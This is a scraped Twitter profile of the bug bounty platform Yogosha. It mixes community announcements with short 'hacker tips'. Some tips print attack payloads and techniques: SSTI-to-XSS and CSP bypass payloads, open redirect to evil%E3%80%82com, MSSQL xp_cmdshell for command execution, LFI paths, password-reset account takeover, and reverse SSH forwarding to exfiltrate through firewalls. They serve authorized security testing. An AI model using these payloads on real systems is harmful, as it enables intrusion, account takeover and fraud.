Yogosha Profile Banner
Yogosha Profile
Yogosha

@YogoshaOfficial

Followers
8,258
Following
356
Media
553
Statuses
1,455

Offensive Security Testing Platform. Bug Bounty, Penetration testing as a Service, VDP & Special Operations.

Paris
Joined July 2015
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@YogoshaOfficial
Yogosha
2 years
[HACKER TIP] Top Burp Suite Extensions: 1- Turbo Intruder 2- J2EEScan 3- Autorize 4- Active Scan++ 5- Collaborator Everywhere 6- Param Miner 7- JSON Beautifier 8- Upload Scanner 9- Freddy 10- Logger++ #bugbounty #hackertips #BurpSuite
Tweet media one
11
108
369
@YogoshaOfficial
Yogosha
5 years
[ #Bugbountytip ] Tomcat is used, yet, port 8080 filtered? use port 8009 which is forgotten “often”. It uses AJP instead of HTTP so you your local apache as local proxy to convert traffic from HTTP to AJP. ProxyPass / ajp://target-ip:8009/ ProxyPassReverse / ajp://target-ip:8009/
1
101
280
@YogoshaOfficial
Yogosha
3 years
[HACKER TIP] If you came across SSTI in a go application, it is worth trying the following payload {{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}} to achieve XSS and bypass HTML sanitization. #bugbounty #hackertips #XSS
Tweet media one
0
105
271
@YogoshaOfficial
Yogosha
2 years
[HACKER TIP] If you are testing Open Redirect but there is a blacklisted character, you can test it with a chinese dot to bypass it or any other Unicode Character. example: redirect_to=////evil%E3%80%82com  #bugbounty #hackertips #openredirect
Tweet media one
3
41
186
@YogoshaOfficial
Yogosha
5 years
Bug bounty tip : If you find XSS in the domain without any CSRF protection, and CSP is enabled, try using the ping attribute, a new <a> tag’s attribute in HTML5 which makes a POST request. Ex XSS Payload : <a href= ping=/changepass?password=new_pwd/>
Tweet media one
4
56
182
@YogoshaOfficial
Yogosha
5 years
[ #Bugbountytip ] ExpressJs runs on port 3000 , and if debug is on, then a lot of information can be disclosed exp : http[s]://example.com:3000/debug/pprof/heap?debug=1 Thanks @D0rkerDevil for this great tip ! Feel free to send us more #hackertips to share with the community
1
72
179
@YogoshaOfficial
Yogosha
5 years
You found a JWT token used for authentification ? Try replacing it with an "undefined", which may result in the application. To logged you in as a random user and bypass the verification step. Exp : Authorization: Bearer undefined Stay tuned for #yogoshaschristmaschallenge ...
4
41
155
@YogoshaOfficial
Yogosha
5 years
Bug Bounty Tip : When you’re testing an application using nginx as proxy, try testing for possible path traversal due to misconfigured alias in nginx config file #bugbounty #incrowdwetrust #ethicalhacking
Tweet media one
1
60
140
@YogoshaOfficial
Yogosha
5 years
[ #bugbountytip ] : If you're blocked by WAF during your pentest, try to hide your IP by forcing the proxy to remove all possible headers by using hop-by-hop headers Exp: Connection: close, X-Originating-IP ,X-Forwarded-For , X-Remote-IP , X-Remote-Addr @TnMch_
0
62
135
@YogoshaOfficial
Yogosha
5 years
You found an LFI but can't disclose all source code due to a different Webroot path Use /proc/self/cwd/ which points to the current directory. (>‿◠)✌ @TnMch_ Exp: /?page=/proc/self/cwd/index.php #bugbounty #bugbountytips
0
38
136
@YogoshaOfficial
Yogosha
3 years
[HACKER TIP] If you got an SQL injection in MSSQL you can elevate the severity of the bug by getting an RCE By enabling xp_cmdshell and then you can execute commands by typing EXEC xp_cmdshell 'Command Option'; Thanks @H4MA_TN for the tip 🙏 #bugbounty #hackertips
Tweet media one
3
35
136
@YogoshaOfficial
Yogosha
3 years
[HACKER TIP] Make sure to always add these headers X-Originating-IP,X-Forwarded-FoR,X-Remote-IP,X-Remote-Addr,X-Client-IP,X-Host,X-Forwarded-Host to your requests with some internal IPs . You may end up bypassing some restrictions. @BelkahlaAhmed1 #bugbounty #hackertips
Tweet media one
1
30
126
@YogoshaOfficial
Yogosha
5 years
[Hacker tips] Are you afraid of CSP when you exploit an XSS ? No worries, sometimes the developer leaves something useful 👇 Exp CSP : Content-Security-Policy: script-src XSS bypass payload : <script src="));"></script> #bugbounty
3
46
119
@YogoshaOfficial
Yogosha
2 years
Congratulations to @HemantSolo for finding the 1st vulnerability of our live hacking event with UAE CSC ! 🔥 @GISECGlobal
Tweet media one
7
2
102
@YogoshaOfficial
Yogosha
3 years
[HACKER TIP] If you are trying to do an SSRF with XXE but some XML entities are blocked, you can try using XML parameter entities. #bugbounty #hackertips #XSS
Tweet media one
0
19
95
@YogoshaOfficial
Yogosha
2 years
[HACKER TIP] If you ever find LibreOffice is being used for file conversion there is a potential SSRF that you can exploit by injecting your payload in the XML. #bugbounty #hackertips
Tweet media one
3
18
80
@YogoshaOfficial
Yogosha
2 years
We're glad to have @infosec_au on our live hacking event with UAE Cybersecurity Council ! Come meet us at @GISECGlobal in the live hacking event room. @etisalat @KPMG_LowerGulf @dutweets
Tweet media one
2
1
72
@YogoshaOfficial
Yogosha
3 years
Finding a hard time to achieve CSRF ? Try using HEAD requests with POST data passed as GET parameters to bypass some protections. Exp: HEAD Request to /login username=foo&password=foo #bugbounty #hackertips
Tweet media one
5
31
69
@YogoshaOfficial
Yogosha
4 years
Looking for IDOR but API return 403 forbidden, try to send wildcard as user id '{"id":"*"}' or use the ID in array '{"id":[123]}'. #bugbounty #hackertips @TnMch_
Tweet media one
0
22
64
@YogoshaOfficial
Yogosha
5 years
Yogosha, pionnier du #bugbounty privé en France, lève 2 millions d'euros pour soutenir sa croissance ! Merci à nos investisseurs, clients et hackers pour leur confiance. @OneRagtime @starquest_k @BNPParibas @axeleo @Ze12thPlayer
3
18
52
@YogoshaOfficial
Yogosha
3 years
Found a prototype pollution but wondering how to escalate it ? You can check this repository to find gadgets in different JS libraries and get an easy XSS. Repo: Thanks to @BelkahlaAhmed1 for this tip and welcome to Yogosha's cyber team ! #bugbounty
Tweet media one
0
15
49
@YogoshaOfficial
Yogosha
2 years
Our live hacking event with UAE Cyber Security Council just started ! After an inspiring talk from our CEO @YassirKazar , 120 hackers started the 48h Bug Bounty journey during @GISECGlobal . #gisec #gisec2022 #livebugbounty #livehackingevent #elitehackers #hackers #hacking
Tweet media one
Tweet media two
Tweet media three
2
3
48
@YogoshaOfficial
Yogosha
2 years
🧶 THREAD 👇 New logo. New website. New product. New Yogosha. Yogosha is about to turn 6, and it has grown up a lot since its debut. This year, there will be more than just a birthday party. It’s time for a new identity, to better match this new era.
Tweet media one
2
2
50
@YogoshaOfficial
Yogosha
3 years
[HACKER TIP] Don't forget to check the subdomain records, and if it is pointing to a service (such as Github Pages .. ) that has been removed or deleted. You can takeover this subdomain if you follow these steps🔥 Thanks @BenaliSemah for the tip 🙏 #bugbounty #hackertips
Tweet media one
0
5
49
@YogoshaOfficial
Yogosha
5 years
[ #bugbountytip ] Found staging application that give you access to a privilege account with default credz, make sure to reuse this domain cookies to the main domain (prod), you can easily access as privileged user. @TnMch_ & Get ready for #yogoshachristmaschallenge next monday !
0
11
41
@YogoshaOfficial
Yogosha
2 years
[HACKER TIP] Enumerate the WordPress Plugins and Themes when working on WP websites. It may be vulnerable to WordPress Plugin Confusion if they are internally developed. Reference:   #bugbounty #WP #WP_Confusion
Tweet media one
0
10
40
@YogoshaOfficial
Yogosha
5 years
Last night #livehackingevent : 74 reports submitted by 70 hackers in 6hours, 42 reports accepted, 10k so far and more to come ! Congratulations to @MrMcCharly fort the 1st place and to all hackers, and thanks to our spanish bank customer for their trust #Rooted2020 #bugbounty
Tweet media one
Tweet media two
Tweet media three
0
17
40
@YogoshaOfficial
Yogosha
5 years
Bug bounty tip by @adrien_jeanneau : Sometimes your target will ask you to pay to access premium features. If they use services like "Stripe", try paying with "test cards" and see if you can have an account or premium features, for free! Thx Adrien for this great tip ! #bugbounty
Tweet media one
1
14
37
@YogoshaOfficial
Yogosha
6 years
Hello hunters ! We're glad to introduce you to researchers who just joined our community. Congratulations to @__SamBeckS__ , @DDXhunter , @N0xx90 , @Nikaiw , @Michel_Gaschet , @RakeshMane10 , @hackerspider1 , @_paillp , @cybxr1998 , @yop_solo , @4bg0P , @IlyassRAHMANI1 #incrowdwetrust
Tweet media one
3
5
35
@YogoshaOfficial
Yogosha
3 years
We're glad to sponsor @GeneralEG64 video with @_JohnHammond 🔥 Check out the video to know more about John's experience, career path, ransomware attacks, Kaseya incident & other topics 👇 & Don't forget to sign up to be invited to our entry test :
Tweet media one
0
2
36
@YogoshaOfficial
Yogosha
3 years
[HACKER TIP] If you find a blind error based XXE but out-of-band interactions are blocked you can use a system DTD and redefine an entity that is declared within that DTD. #bugbounty #hackertips
Tweet media one
1
14
34
@YogoshaOfficial
Yogosha
3 years
We are honored that when it comes to security communities, we have the BEST. We want to thank everyone who participated in one of our programs for their hard work and for their trust in us 🙏 Here is the TOP10 hackers list for 2021 👇 #bugbounty #hacking #hackers #top10hackers
2
8
34
@YogoshaOfficial
Yogosha
5 years
We're live ! Our live #bugbounty is going great, first vulnerabilities are already submitted & accepted, hackers are rocking it ! @thalesgroup #livehackingevent #incrowdwetrust @_K33n_ @YassirKazar
Tweet media one
Tweet media two
Tweet media three
1
4
36
@YogoshaOfficial
Yogosha
3 years
Top 10 hackers S2 2021 🔥 Before revealing our Top 2021, we wanted to congratulate the top 10 hackers on Yogosha's platform during S2 2021. 👉 @B_Z_Hash @llamaonsecurity @HemantSolo @vishwaraj101 @intruderhex @Cyber_Ravindra @RiteshG37659480 @Ric0sMat @TnMch_ @Ch3n4p4N
Tweet media one
0
6
33
@YogoshaOfficial
Yogosha
3 years
Welcome to the 6 new hunters who brilliantly passed our last entry test with @hackthebox_eu ! Congratulations to @chaskar_shubham , Sheriff64, @HemantSolo , @x3n0n_me , @ataysec & @ray_2sec . We're glad to have you in our community 🙌 #bugbounty #crowdsourcedsecurity #hackers
Tweet media one
3
10
34
@YogoshaOfficial
Yogosha
2 years
Here are our top 10 for Q1 of 2022🥳 Congratz everyone🔥 1- @TnMch_ 2- @B_Z_Hash 3- @YanZaX 4- @anilyukk 5- @Kuromatae666 6- @vishwaraj101 7- @HemantSolo 8- @sh4nx0r 9- @0xAyub 10- @AymenBorgi We are glad to have you in our community! Keep hacking and securing the world!
Tweet media one
Tweet media two
Tweet media three
Tweet media four
1
6
34
@YogoshaOfficial
Yogosha
2 years
Here are our TOP 10 for Q2 of 2022 🥳 Congratulations everyone 🔥 1- @TheCyberButcher 2- @B_Z_Hash 3- @th3cyb3rc0p 4- @0xAyub 5- @HemantSolo 6- @vishwaraj101 7- @sh4nx0r 8- @komradz86 9- @AhmedElmalky00 10- @Cyber_Ravindra
Tweet media one
1
2
34
@YogoshaOfficial
Yogosha
3 years
End of our first entry test session with @hackthebox_eu ! We’ve got 6 hackers accepted from 20 participants, good job guys. 👏 Congratulations to @_erk3_ , @R0X4R , @rajepati , @theamanrawat , @SecGus , @deathflash1411 for joining our community, we’re thrilled to have you :)
Tweet media one
2
6
34
@YogoshaOfficial
Yogosha
3 years
Welcome to @BelkahlaAhmed1 our new cybersecurity specialist ! 👏 Ahmed will help us grow our hackers community while maintaining our high level of expertise. He will work closely with our hacker ambassador @Ging_Freex on managing the community. #bugbounty #hackers
Tweet media one
1
3
34
@YogoshaOfficial
Yogosha
6 years
Best practice of the week : when submitting a report to a client, make sure the title is well written & descriptive. Examples in the picture below 👇 #incrowdwetrust #bugbounty
Tweet media one
2
6
33
@YogoshaOfficial
Yogosha
5 years
«When I create a new CTF, I start by coding tasks and preparing the environment & the CTF platform. Then, I deploy tasks on different servers and Dockerize them.» To know more about @TnMch_ , security analyst and CTF manager at Yogosha : #incrowdwetrust
0
6
32
@YogoshaOfficial
Yogosha
5 years
Hi hunters, ready for our #yogoshachristmaschallenge , made by @TnMch_ & @Ging_Freex ? #BurpSuite , #HackRF and more awesome prizes to win ! See you next monday for the launch, don’t forget to check us on twitter to get updates about the challenge. #bugbounty
Tweet media one
0
12
32
@YogoshaOfficial
Yogosha
2 years
We've just passed the 10k ! Our elite hackers are in the top ten, congratulations to @B_Z_Hash , @YanZaX , @TnMch_ , @komradz86 , and for all the hackers for their awesome work 👏 @rootedcon @leboncoin
Tweet media one
1
8
33
@YogoshaOfficial
Yogosha
5 years
Hacker tip @CyberSecMonth : Bypass #CSRF Got an #XSS yet can't steal session data or csrf token because of HttpOnly flag?👉use cookies tossing attack by setting cookies of the main domain as subdomains which confuses the browser with identical cookies and hides its source @TnMch_
Tweet media one
1
13
33
@YogoshaOfficial
Yogosha
2 years
🎄HO HO HO! CTF Santa is here, and he’s got presents for you! Our individual Christmas CTF challenge is about to begin, from December 19th to 25th. You can already register for the party here: No gifts for the good boys, only for the nastiest hunters 👇
Tweet media one
1
3
31
@YogoshaOfficial
Yogosha
6 years
Yogosha remporte le prix du jury de la start-up #FIC2019 ! Bravo à toute l’équipe et merci aux jury du FIC, qui confirme notre positionnement différenciant sur le marché du #bugbounty . Retrouvez-nous au stand E36 du @FIC2019 en janvier ! @YassirKazar #crowdsourcedsecurity
Tweet media one
Tweet media two
3
16
32
@YogoshaOfficial
Yogosha
2 years
During @GISECGlobal , we've organized the first and largest Live Hacking Event in the UAE with the UAE Cybersecurity Council ! 123 elite hackers gathered for 72h of intensive hacking on awesome targets such as satellites, drones... Discover the event 👇
1
2
32
@YogoshaOfficial
Yogosha
5 years
Congratulations to our top 10 hunters of the month 🙏 To all hackers : don't forget to check your emails, a new entry test to join the platform is on its way... For those who haven't already signed up to Yogosha : #bugbounty
Tweet media one
6
7
30
@YogoshaOfficial
Yogosha
2 years
Much love to the German hunters from the #KAEFERJAEGER Team🇩🇪 who will meet this weekend in Göttingen for their annual Live Hacking Event - with some hot scopes invited to the party such as @PaymobCompany . Godspeed fellows ; get those bugs down & kippt diesen Rothaus runter! 🍻
2
9
31
@YogoshaOfficial
Yogosha
5 years
Proud of our CTF team Yogos'hack who arrived in the top 10 of #HackConCTF ! Our team is coming back on september 14, for @AperiKube CTF in Rennes, organized by a member of our community. Congratulations to @kalimer0x00 @Kuromatae666 @coffee_n_weed @lefnui
1
6
29
@YogoshaOfficial
Yogosha
3 years
Welcome to the 8 new hackers who joined our community this week ! @amellb , @Harie0x , @joanthraper , @kiranbattaluri , @Hunt2behunter , @NotOnSocial , @impratikdabhi , @ashrafharb97 🙌 👉Sign up to our platform to be invited to the next challenges :
Tweet media one
0
6
30
@YogoshaOfficial
Yogosha
6 years
On june 19th, Yogosha will organize the first @hackinparis live hacking event ! A unique opportunity for Hack In Paris attendees to meet with talented hackers and win great bounties ;) To participate : #bugbounty #livehackingevent #incrowdwetrust
Tweet media one
0
13
29
@YogoshaOfficial
Yogosha
3 years
Don’t miss our Christmas Challenge the 25th of December, solve the different tasks and win valuable prizes 🏆 1st Place: eWPTXv2 Voucher 2nd Place: 200$ Amazon Gift Card 3rd Place: 6 months PentesterLab Pro Best Writeup: 50$ Amazon Gift Card More details will be announced soon🎄
Tweet media one
0
12
28
@YogoshaOfficial
Yogosha
2 years
Hunters Survival Game #2 // Here are the TOP 10 best hunters of Round #1 ! Congratulations 👏 @TheCyberButcher @B_Z_Hash @manash036 @sh4nx0r @AMakki1337 @acut3hack @0x0asif @0xAyub @s3curityb3ast @a1woareS See y’all for Round #2 , starting tomorrow 💪
Tweet media one
6
3
29
@YogoshaOfficial
Yogosha
5 years
We're live ! @gwendallecoguic , bug bounty hunter, is talking about website security vulnerabilities on @Twitch @behind_thecode : #bugbounty #hacking
Tweet media one
0
12
29
@YogoshaOfficial
Yogosha
5 years
Tomorrow, be ready for our live #hacking event with @hackinparis ! Awesome bounties & swags to win during this great night of hacking #incrowdwetrust
Tweet media one
1
5
30
@YogoshaOfficial
Yogosha
2 years
Congratulations to @c0braBaghdad1 , @sinnerx_9 & @exploit_msf for winning our #CTF during @GISECGlobal ! A huge thanks to our partner @hackthebox_eu for the prizes 🙏 @dutweets @KPMG_LowerGulf @etisalat
Tweet media one
0
5
29
@YogoshaOfficial
Yogosha
6 years
Yogosha reçoit le prix du jury de la startup #FIC2019 ! Félicitations aux autres vainqueurs @data_dome et @LoklyTeam , et merci à l'équipe du @FIC_fr et à @AirbusCyber pour le parrainage et la remise des prix #bugbounty #incrowdwetrust
Tweet media one
Tweet media two
2
8
29
@YogoshaOfficial
Yogosha
4 years
if you find “403 Forbidden” while accessing a specific path, try using ";" which can lead to bypassing the restrictions. Exp : #bugbounty #hackertips @TnMch_
Tweet media one
0
4
27
@YogoshaOfficial
Yogosha
5 years
#Exfiltrating_Data : In an internal pentest and Firewall blocking external connections (internet). Bypass restriction using reverse ssh port forwarding. ssh -R 2210:localhost:22 external-ip //on internal-host (victim) ssh -p 2210 localhost //on outside-host @Ging_Freex
1
13
28
@YogoshaOfficial
Yogosha
3 years
Hi hunters, we have great news for you. We're thrilled to welcome 7 new hunters thanks to our last testing session with @hackthebox_eu Congratulations to @0xabhijeet , @i_m_deena_ , @jensvoid , @parveen1015 , @cyber01_ , @RiteshG37659480 , @Cyber_Ravindra ! 👏 #bugbounty
Tweet media one
1
4
27
@YogoshaOfficial
Yogosha
5 years
Hi hunters ! This month, our top 10 includes @ycam_asafety @intruderhex @TaupinGeorges @B_Z_Hash @MrB0LTv2 @NERVEUxxxx @mpgn_x64 @Mescal_Hzv & nj8. Congratulations to all researchers hunting on our platform, and keep doing a great job ! #incrowdwetrust
Tweet media one
1
4
27
@YogoshaOfficial
Yogosha
1 year
End of our Live Hacking Event at @rootedcon with @leboncoinEng & @LaRedouteFr ... What a night! After 10h of intense hacking, hackers won more than 36k rewards🔥 Congratulations to all hackers for their fantastic work. #livehackingevent @z3r00t @TnMch_ @Yassineaboukir
Tweet media one
Tweet media two
Tweet media three
2
2
26
@YogoshaOfficial
Yogosha
7 years
Yogosha, les hackers au secours du CAC40 à lire dans le Management de novembre
Tweet media one
0
7
27
@YogoshaOfficial
Yogosha
3 years
A Golden ticket to join our private community ! If you manage to solve the following challenge before the 28th of November and share your writeup with the hashtag #FuinjutsuYogosha and tag Yogosha twitter account. GL & HF Everyone!
2
9
27
@YogoshaOfficial
Yogosha
4 years
Congratulations to all hackers who participated to our entry test ! 35 #hackers out of 155 in 10 different countries succeeded our #CTF and joined Yogosha's family. We're really proud of you hunters, and a big thanks to our great @TnMch_ for creating the challenges :) #bugbounty
Tweet media one
2
6
27
@YogoshaOfficial
Yogosha
2 years
We're happy to announce our latest competition, 😎Hunters Survival Games, the first battle royal style bug bounty competition, Where 100 of the best of our community will battle to see who will be able to survive until the end.☠️ Let's see who will be the Master of the hunt 🔥💪
Tweet media one
1
6
27
@YogoshaOfficial
Yogosha
4 years
There isn't just one way to authenticate with an API! Find old versions, and if there is /api/v3/ ,check if /api/v1/ also exists > It could be vulnerable. #bugbounty #hackertips @TnMch_
Tweet media one
2
7
26
@YogoshaOfficial
Yogosha
2 years
We are thrilled to announce that Yogosha will be hosting the first edition of @GISECGlobal live hacking event from 21st to 23rd of March, along with a CTF 💥 This event is in partnership with GISEC Global, DXB LIVE and Dubai World Trade Centre. More info coming soon...
Tweet media one
1
6
26
@YogoshaOfficial
Yogosha
5 years
Thanks to our hunter @YanZaX who came to say hello, and picked up his "Most valuable hunter" trophee for @hackinparis live hacking event ! @thalesgroup Don't hesitate to drop by, we're located in Paris Grands Boulevard :) #bugbounty
Tweet media one
0
4
26
@YogoshaOfficial
Yogosha
2 years
And the winner is... @z3r00t ! 🥂 Congratulations to @z3r00t , part of @Telefonica Red Team and Yogosha's elite community, for being the best hacker of our live hacking event with @rootedcon . Thanks to all hackers for their great work 🙏 @pcaro90 Jose Hermida @leboncoin
Tweet media one
2
3
25
@YogoshaOfficial
Yogosha
5 years
Hi hunters, thanks for participating to #yogoshachristmaschallenge . We hoped you enjoyed it, and congratulations to @YanZax , , @ReeverZax , @0xpwny for winning the challenge, and @maxenceschmitt who won our special prize for writing the best report ! #bugbounty
Tweet media one
3
5
26
@YogoshaOfficial
Yogosha
7 years
Ce soir, ne manquez pas notre CEO @YassirKazar , sur le plateau d' @EnvoyeSpecial avec @EliseLucet sur @France2tv pour discuter #ran çongiciels & #CyberSec !!
Tweet media one
1
25
26
@YogoshaOfficial
Yogosha
5 years
Welcome to @TnMch_ & @MedFoudhili , who joined us as hacker ambassador & security expert. We're thrilled to welcome these great #hackers , who bring us years of expertise in cybersecurity and #bugbounty ! #incrowdwetrust
Tweet media one
1
5
26
@YogoshaOfficial
Yogosha
4 years
When you think you find XSS by end up bypassing the WAF 😰🙈
Tweet media one
0
4
24
@YogoshaOfficial
Yogosha
3 years
Hi hunters, welcome to the 4 new hackers who just joined our community ! Congratulations to @CYBERINFO_47 , @IDA_kahlo , @sh4nx0r , @H4MA_TN 👏 Don't forget to sign up to the platform to be invited to our next entry tests : #bugbounty #hackers #hacking
Tweet media one
1
6
24
@YogoshaOfficial
Yogosha
6 years
Check out our hall of fame for february ! Thanks for your amazing work everyone, and congratulations to @ycam_asafety @B_Z_Hash @TnMch_ @adrien_jeanneau @Kuromatae666 @YanZaX @intruderhex @Raphzer @_ACKNAK_ @lestutosdenico
Tweet media one
2
3
25
@YogoshaOfficial
Yogosha
7 years
Pitch time for ou CEO @yassirkazar during #BNP Paribas Plug & Play @joinStationF !
Tweet media one
0
13
25
@YogoshaOfficial
Yogosha
5 years
Today, we receive the France Cybersecurity Label at @FIC_eu ! Meet us at booth D21 #bugbounty
Tweet media one
1
8
22
@YogoshaOfficial
Yogosha
6 years
Have you every wondered which sections to put in your reports? Check out our best practice of the week by @gwendallecoguic 👇 #incrowdwetrust #bugbounty #hackertips
Tweet media one
1
13
21
@YogoshaOfficial
Yogosha
3 years
Hi hunters ! Today we welcome 10 new members in our community 👏 Congratulations to @HeBo117 , @Mohish147 , @acut3hack , trancap, @rudr4_sarkar , @Troll_13 , @yaser_s , @yavuzatlas_ , @komradz86 & saad113 @hackthebox_eu #bugbounty #hacking
Tweet media one
3
3
24
@YogoshaOfficial
Yogosha
5 years
If you find an #API using JWT as authentification token, and can’t manage to crack it, try to overwrite its default data, unexpected data can break everything ! 👉 curl -X POST "" -d '{"is_admin":true,"email": "hunter @yogo .com", "password": "pass"}' @TnMch_
Tweet media one
0
6
23
@YogoshaOfficial
Yogosha
3 years
We are proud to announce that we raised 10 million euros Series A 🔥 Thanks to the amazing Tikehau Ace Capital team for believing in our product and thank you @OneRagtime and @BNPParibas Développement for your support. More info here 👉
Tweet media one
1
5
24
@YogoshaOfficial
Yogosha
5 years
Yogosha's team having a great time for our Christmas lunch ! Merry Christmas everyone and happy holiday season
Tweet media one
0
4
23
@YogoshaOfficial
Yogosha
4 years
When testing the password reset function, be sure to add your email with the victim's email, it can send you both the verification reset code which makes account takeover possible. exp : {"email":["victim @gmail .com","your_email @gmail .com"]} #bugbounty #hackertips @TnMch_
Tweet media one
0
4
22
@YogoshaOfficial
Yogosha
4 years
In 2019, only between 11-to-20% of cybersecurity professionals were women. @_K33n_ , Yogosha's CTO, explains and raises concerns about existing biases towards females in the #cybersecurity professional world : @m49D4ch3lly #bugbounty
Tweet media one
0
16
23
@YogoshaOfficial
Yogosha
3 years
Hi hunters, check out our leaderboard for S1 2021 ! 👇 Congratulations to @vishwaraj101 , @bugraeskici , @intruderhex , @llamaonsecurity , @hasanemrebeyy , @B_Z_Hash , @Kuromatae666 , @Ch3n4p4N , M0N5T3R, @AdibouSec And thanks to all of you for your great work and commitment 👏
Tweet media one
0
2
22
@YogoshaOfficial
Yogosha
5 years
"If you find a special CMS on a subdomain, you can try to find another sites which are using it and gather many endpoints using google." site:specialCMS.*.com inurl:/special/cms/endpoint Thanks @Kuromatae666 for the #hackertip !
Tweet media one
0
7
23
@YogoshaOfficial
Yogosha
5 years
Check our our hall of fame for march ! Thanks everyone for your great work @YanZaX @ycam_asafety @adrien_jeanneau @mskl_bb @B_Z_Hash Pradeep Bhat @intruderhex @aikarifb @Gromak123_Sec @omarbv
Tweet media one
2
8
22
@YogoshaOfficial
Yogosha
2 years
Ladies and gentlemen, Round 1 of our Event “Hunters Survival Games” has ended, and the second round started today! Some hackers have found their way to survive the first round and fight for the second round; unfortunately, some have been eliminated! Two more rounds to go! Top10:
Tweet media one
2
4
21
@YogoshaOfficial
Yogosha
5 years
"Writing PoC is a good way to have an in-depth understanding of the vulnerability. When you reproduce a vulnerability, you realize that it can be a bit more complex to get a reverse shell or a reflected command injection rather than a calc." @mpgn_x64
0
2
22